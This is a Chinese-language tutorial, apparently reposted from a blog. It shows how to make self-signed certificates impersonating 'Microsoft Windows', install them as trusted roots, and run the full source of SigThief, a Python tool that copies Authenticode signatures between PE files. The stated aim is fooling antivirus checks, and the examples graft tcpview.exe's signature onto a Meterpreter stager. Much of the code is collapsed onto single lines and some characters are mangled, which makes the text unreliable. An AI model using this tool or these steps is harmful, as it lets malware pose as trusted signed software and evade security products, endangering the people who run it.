Python使用sigthief簽發(fā)證書(shū)的實(shí)現(xiàn)步驟
證書(shū)制作工具下載: https://github.com/3gstudent/signtools
制作并簽發(fā)證書(shū):正常情況下,針對(duì)exe簽發(fā)證書(shū)有如下幾個(gè)步驟.
1.查詢一個(gè)程序中存在的證書(shū),可以使用下面三個(gè)命令。
c:> signtools Get-AuthenticodeSignature C:WindowsSystem32ConsentUX.dllc:> signtools signtool.exe verify /v C:WindowsSystem32ConsentUX.dllc:> signtools sigcheck.exe -q C:WindowsSystem32ConsentUX.dll
2.使用makecert命令制作證書(shū),sv-私鑰文件名,ss-主題的證書(shū)存儲(chǔ)名稱,n-證書(shū)頒發(fā)對(duì)象,r-證書(shū)存儲(chǔ)位置。
c:> signtools makecert -n 'CN=Microsoft Windows' -r -sv Root.pvk Root.cerc:> signtools cert2spc Root.cer Root.spcc:> signtools pvk2pfx -pvk Root.pvk -pi 1233 -spc Root.spc -pfx Root.pfx -f
3.注冊(cè)證書(shū)與簽發(fā)證書(shū)。
c:> signtools certmgr.exe -add -c Root.cer -s -r localmachine rootc:> signtools signtool sign /f Root.pfx /p 1233 lyshark.exe
而如果要給PowerShell腳本添加證書(shū),則執(zhí)行如下命令即可.
1.生成證書(shū)文件
c:> makecert -n 'CN=Microsoft Windows' -r -eku 1.3.6.1.5.5.7.3.3 -sv certtest.pvk certtest.cerc:> cert2spc certtest.cer certtest.spcc:> pvk2pfx -pvk certtest.pvk -pi 123123 -spc certtest.spc -pfx certtest.pfx -f
2.給powershell腳本簽名
c:> powershellc:> $cert = Get-PfxCertificate certtest.pfxc:> Set-AuthenticodeSignature -Filepath lyshark.ps1 -Cert $cert偽造PE文件證書(shū):
有些反病毒軟件供應(yīng)商優(yōu)先考慮某些證書(shū)頒發(fā)機(jī)構(gòu)而不檢查簽名是否真正有效,并且有一些只是檢查以查看certTable是否填充了某些值。這個(gè)工具讓你快速將從已簽名的PE文件中刪除簽名并將其附加到另一個(gè)文件,修復(fù)證書(shū)表以對(duì)文件進(jìn)行簽名。
開(kāi)源工具SigThief可用于偽造證書(shū),將下方代碼保存為sigthief.py即可:
import sysimport structimport shutilimport iofrom optparse import OptionParserdef gather_file_info_win(binary):'''Borrowed from BDF...I could just skip to certLOC... *shrug*'''flItms = {}binary = open(binary, ’rb’)binary.seek(int(’3C’, 16))flItms[’buffer’] = 0flItms[’JMPtoCodeAddress’] = 0flItms[’dis_frm_pehdrs_sectble’] = 248flItms[’pe_header_location’] = struct.unpack(’<i’, binary.read(4))[0]# Start of COFFflItms[’COFF_Start’] = flItms[’pe_header_location’] + 4binary.seek(flItms[’COFF_Start’])flItms[’MachineType’] = struct.unpack(’<H’, binary.read(2))[0]binary.seek(flItms[’COFF_Start’] + 2, 0)flItms[’NumberOfSections’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’TimeDateStamp’] = struct.unpack(’<I’, binary.read(4))[0]binary.seek(flItms[’COFF_Start’] + 16, 0)flItms[’SizeOfOptionalHeader’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’Characteristics’] = struct.unpack(’<H’, binary.read(2))[0]#End of COFFflItms[’OptionalHeader_start’] = flItms[’COFF_Start’] + 20#if flItms[’SizeOfOptionalHeader’]: #Begin Standard Fields section of Optional Headerbinary.seek(flItms[’OptionalHeader_start’])flItms[’Magic’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’MajorLinkerVersion’] = struct.unpack('!B', binary.read(1))[0]flItms[’MinorLinkerVersion’] = struct.unpack('!B', binary.read(1))[0]flItms[’SizeOfCode’] = struct.unpack('<I', binary.read(4))[0]flItms[’SizeOfInitializedData’] = struct.unpack('<I', binary.read(4))[0]flItms[’SizeOfUninitializedData’] = struct.unpack('<I', binary.read(4))[0]flItms[’AddressOfEntryPoint’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’PatchLocation’] = flItms[’AddressOfEntryPoint’]flItms[’BaseOfCode’] = struct.unpack(’<I’, binary.read(4))[0]if flItms[’Magic’] != 0x20B: flItms[’BaseOfData’] = struct.unpack(’<I’, binary.read(4))[0]# End Standard Fields section of Optional Header# Begin Windows-Specific Fields of Optional Headerif flItms[’Magic’] == 0x20B: flItms[’ImageBase’] = struct.unpack(’<Q’, binary.read(8))[0]else: flItms[’ImageBase’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’SectionAlignment’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’FileAlignment’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’MajorOperatingSystemVersion’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’MinorOperatingSystemVersion’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’MajorImageVersion’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’MinorImageVersion’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’MajorSubsystemVersion’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’MinorSubsystemVersion’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’Win32VersionValue’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’SizeOfImageLoc’] = binary.tell()flItms[’SizeOfImage’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’SizeOfHeaders’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’CheckSum’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’Subsystem’] = struct.unpack(’<H’, binary.read(2))[0]flItms[’DllCharacteristics’] = struct.unpack(’<H’, binary.read(2))[0]if flItms[’Magic’] == 0x20B: flItms[’SizeOfStackReserve’] = struct.unpack(’<Q’, binary.read(8))[0] flItms[’SizeOfStackCommit’] = struct.unpack(’<Q’, binary.read(8))[0] flItms[’SizeOfHeapReserve’] = struct.unpack(’<Q’, binary.read(8))[0] flItms[’SizeOfHeapCommit’] = struct.unpack(’<Q’, binary.read(8))[0]else: flItms[’SizeOfStackReserve’] = struct.unpack(’<I’, binary.read(4))[0] flItms[’SizeOfStackCommit’] = struct.unpack(’<I’, binary.read(4))[0] flItms[’SizeOfHeapReserve’] = struct.unpack(’<I’, binary.read(4))[0] flItms[’SizeOfHeapCommit’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’LoaderFlags’] = struct.unpack(’<I’, binary.read(4))[0] # zeroflItms[’NumberofRvaAndSizes’] = struct.unpack(’<I’, binary.read(4))[0]# End Windows-Specific Fields of Optional Header# Begin Data Directories of Optional HeaderflItms[’ExportTableRVA’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’ExportTableSize’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’ImportTableLOCInPEOptHdrs’] = binary.tell()#ImportTable SIZE|LOCflItms[’ImportTableRVA’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’ImportTableSize’] = struct.unpack(’<I’, binary.read(4))[0]flItms[’ResourceTable’] = struct.unpack(’<Q’, binary.read(8))[0]flItms[’ExceptionTable’] = struct.unpack(’<Q’, binary.read(8))[0]flItms[’CertTableLOC’] = binary.tell()flItms[’CertLOC’] = struct.unpack('<I', binary.read(4))[0]flItms[’CertSize’] = struct.unpack('<I', binary.read(4))[0]binary.close()return flItmsdef copyCert(exe): flItms = gather_file_info_win(exe) if flItms[’CertLOC’] == 0 or flItms[’CertSize’] == 0:# not signedprint('Input file Not signed!')sys.exit(-1) with open(exe, ’rb’) as f:f.seek(flItms[’CertLOC’], 0)cert = f.read(flItms[’CertSize’]) return certdef writeCert(cert, exe, output): flItms = gather_file_info_win(exe)if not output: output = output = str(exe) + '_signed' shutil.copy2(exe, output)print('Output file: {0}'.format(output)) with open(exe, ’rb’) as g:with open(output, ’wb’) as f: f.write(g.read()) f.seek(0) f.seek(flItms[’CertTableLOC’], 0) f.write(struct.pack('<I', len(open(exe, ’rb’).read()))) f.write(struct.pack('<I', len(cert))) f.seek(0, io.SEEK_END) f.write(cert) print('Signature appended. nFIN.')def outputCert(exe, output): cert = copyCert(exe) if not output:output = str(exe) + '_sig' print('Output file: {0}'.format(output)) open(output, ’wb’).write(cert) print('Signature ripped. nFIN.')def check_sig(exe): flItms = gather_file_info_win(exe) if flItms[’CertLOC’] == 0 or flItms[’CertSize’] == 0:# not signedprint('Inputfile Not signed!') else:print('Inputfile is signed!')def truncate(exe, output): flItms = gather_file_info_win(exe) if flItms[’CertLOC’] == 0 or flItms[’CertSize’] == 0:# not signedprint('Inputfile Not signed!')sys.exit(-1) else:print( 'Inputfile is signed!') if not output:output = str(exe) + '_nosig' print('Output file: {0}'.format(output)) shutil.copy2(exe, output) with open(output, 'r+b') as binary:print(’Overwriting certificate table pointer and truncating binary’)binary.seek(-flItms[’CertSize’], io.SEEK_END)binary.truncate()binary.seek(flItms[’CertTableLOC’], 0)binary.write(b'x00x00x00x00x00x00x00x00') print('Signature removed. nFIN.')def signfile(exe, sigfile, output): flItms = gather_file_info_win(exe)cert = open(sigfile, ’rb’).read() if not output: output = output = str(exe) + '_signed' shutil.copy2(exe, output)print('Output file: {0}'.format(output))with open(exe, ’rb’) as g:with open(output, ’wb’) as f: f.write(g.read()) f.seek(0) f.seek(flItms[’CertTableLOC’], 0) f.write(struct.pack('<I', len(open(exe, ’rb’).read()))) f.write(struct.pack('<I', len(cert))) f.seek(0, io.SEEK_END) f.write(cert) print('Signature appended. nFIN.')if __name__ == '__main__': usage = ’usage: %prog [options]’ parser = OptionParser() parser.add_option('-i', '--file', dest='inputfile', help='input file', metavar='FILE') parser.add_option(’-r’, ’--rip’, dest=’ripsig’, action=’store_true’, help=’rip signature off inputfile’) parser.add_option(’-a’, ’--add’, dest=’addsig’, action=’store_true’, help=’add signautre to targetfile’) parser.add_option(’-o’, ’--output’, dest=’outputfile’, help=’output file’) parser.add_option(’-s’, ’--sig’, dest=’sigfile’, help=’binary signature from disk’) parser.add_option(’-t’, ’--target’, dest=’targetfile’, help=’file to append signature to’) parser.add_option(’-c’, ’--checksig’, dest=’checksig’, action=’store_true’, help=’file to check if signed; does not verify signature’) parser.add_option(’-T’, ’--truncate’, dest='truncate', action=’store_true’, help=’truncate signature (i.e. remove sig)’) (options, args) = parser.parse_args()# rip signature # inputfile and rip to outputfile if options.inputfile and options.ripsig:print('Ripping signature to file!')outputCert(options.inputfile, options.outputfile)sys.exit()# copy from one to another # inputfile and rip to targetfile to outputfileif options.inputfile and options.targetfile:cert = copyCert(options.inputfile)writeCert(cert, options.targetfile, options.outputfile)sys.exit() # check signature # inputfile if options.inputfile and options.checksig:check_sig(options.inputfile) sys.exit() # add sig to target file if options.targetfile and options.sigfile:signfile(options.targetfile, options.sigfile, options.outputfile)sys.exit() # truncate if options.inputfile and options.truncate:truncate(options.inputfile, options.outputfile)sys.exit() parser.print_help() parser.error('You must do something!')
我們需要找一個(gè)帶有證書(shū)的文件,然后通過(guò)使用sigthief.py完成證書(shū)的克隆。此處就拿系統(tǒng)中的ConsentUX.dll演示。
c:> python sigthief.py -i ConsentUX.dll -t lyshark.exe -o check.exeOutput file: check.exeSignature appended.FIN.
也可以從二進(jìn)制文件中獲取簽名并將其添加到另一個(gè)二進(jìn)制文件中
$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe Output file: /tmp/msftesting_tcpview.exeSignature appended. FIN.
將簽名保存到磁盤以供以后使用,提供了一個(gè)轉(zhuǎn)存功能。
$ ./sigthief.py -i tcpview.exe -r Ripping signature to file!Output file: tcpview.exe_sigSignature ripped. FIN.```BASH使用翻錄簽名```BASH$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe Output file: x86_meterpreter_stager.exe_signedSignature appended. FIN.```BASH截?cái)啵▌h除)簽名 這實(shí)際上有非常有趣的結(jié)果,可以幫助您找到重視代碼功能簽名的AV)```BASH$ ./sigthief.py -i tcpview.exe -T Inputfile is signed!Output file: tcpview.exe_nosigOverwriting certificate table pointer and truncating binarySignature removed. FIN.
文章出處:https://www.cnblogs.com/lyshark
以上就是Python使用sigthief簽發(fā)證書(shū)的實(shí)現(xiàn)步驟的詳細(xì)內(nèi)容,更多關(guān)于Python使用sigthief簽發(fā)證書(shū)的資料請(qǐng)關(guān)注好吧啦網(wǎng)其它相關(guān)文章!
相關(guān)文章:
網(wǎng)公網(wǎng)安備